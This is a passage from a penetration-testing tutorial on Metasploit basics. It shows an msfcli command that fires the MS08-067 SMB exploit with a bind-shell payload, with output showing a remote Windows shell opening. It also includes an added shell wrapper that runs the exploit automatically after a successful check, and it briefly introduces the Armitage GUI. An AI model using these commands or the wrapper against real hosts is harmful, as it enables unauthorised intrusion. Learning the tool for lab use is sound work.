Metasploit Basics

11

Compatible payloads
===================

   Name                     Description
   ----                     -----------
   generic/debug_trap       Generate a debug trap in the target process
   generic/shell_bind_tcp   Listen for a connection and spawn a command shell

Having set all the required options for our exploit and selected a payload, we can run our exploit by passing the letter E to the end of the msfcli argument string, as shown here:

root@bt:/# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E

[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

We're successful, because we have received a Windows command prompt from the remote system.
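The msfcli invocation above has a fixed shape: module name first, KEY=VALUE options in the middle, and a single mode letter last (H, S, O, A, I, P, T, AC, C or E, as listed by msfcli -h in Metasploit 3.x). Because ms08_067_netapi, like many service exploits, can crash the target service if the target is mis-fingerprinted, a practitioner normally runs the module's (C)heck mode before (E)xecute. The wrapper below is an added example, not code from the book or from the Metasploit project: it validates the mode letter, refuses to check or execute without RHOST, and only executes when the check output reports a vulnerable target. The functions build_msfcli_args and check_then_exploit, the MSFCLI override variable, and the assumption that a vulnerable check prints a line containing "is vulnerable" or "appears to be vulnerable" are all this example's own.

```shell
#!/bin/sh
# Added example (not from the book): a POSIX-sh wrapper around the msfcli
# invocation style shown above.  MSFCLI defaults to "msfcli" and can be
# overridden (for instance with a stub function) when testing offline.
MSFCLI="${MSFCLI:-msfcli}"

# Mode letters accepted by msfcli 3.x (from msfcli -h):
# (H)elp (S)ummary (O)ptions (A)dvanced (I)DS evasion (P)ayloads (T)argets
# (AC)tions (C)heck (E)xecute
is_valid_mode() {
    case "$1" in
        H|S|O|A|I|P|T|AC|C|E) return 0 ;;
        *) return 1 ;;
    esac
}

# build_msfcli_args MODULE MODE [KEY=VALUE ...]
# Prints the argument string in the order msfcli expects: module, options,
# mode letter last.  Check and Execute are refused without an RHOST option.
build_msfcli_args() {
    module="$1"; mode="$2"; shift 2
    is_valid_mode "$mode" || { echo "invalid msfcli mode: $mode" >&2; return 1; }
    if [ "$mode" = "E" ] || [ "$mode" = "C" ]; then
        case " $* " in
            *" RHOST="*) ;;
            *) echo "RHOST=... is required for mode $mode" >&2; return 1 ;;
        esac
    fi
    printf '%s' "$module"
    for kv in "$@"; do
        case "$kv" in
            *=*) printf ' %s' "$kv" ;;
            *) echo "option must be KEY=VALUE: $kv" >&2; return 1 ;;
        esac
    done
    printf ' %s\n' "$mode"
}

# check_then_exploit MODULE [KEY=VALUE ...]
# Runs the module in (C)heck mode and only runs it in (E)xecute mode if the
# check output reports the target as vulnerable.  The phrases matched are an
# assumption about msfcli's check output, not something the book documents.
check_then_exploit() {
    module="$1"; shift
    check_args=$(build_msfcli_args "$module" C "$@") || return 1
    check_out=$($MSFCLI $check_args 2>&1)
    if printf '%s\n' "$check_out" | grep -Eiq 'is vulnerable|appears to be vulnerable'; then
        exploit_args=$(build_msfcli_args "$module" E "$@") || return 1
        $MSFCLI $exploit_args
    else
        echo "check did not report a vulnerable target; not exploiting" >&2
        return 2
    fi
}
```

Typical use mirrors the command above: check_then_exploit windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp. The option-order check matters because msfcli reads the final argument as the mode letter; an option placed after it would be silently misread.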

Armitage

The armitage component of Metasploit is a fully interactive graphical user interface created by Raphael Mudge. This interface is highly impressive, feature rich, and available for free. We won't be covering armitage in depth, but it is definitely worth mentioning as something to explore. Our goal is to teach the ins and outs of Metasploit, and the GUI is awesome once you understand how the Framework actually operates.

Running Armitage

To launch armitage, run the command armitage. During startup, select Start MSF, which will allow armitage to connect to your Metasploit instance.

root@bt:/opt/framework3/msf3# armitage

After armitage is running, simply click a menu to perform a particular attack or access other Metasploit functionality. For example, Figure 2-1 shows the browser (client-side) exploits.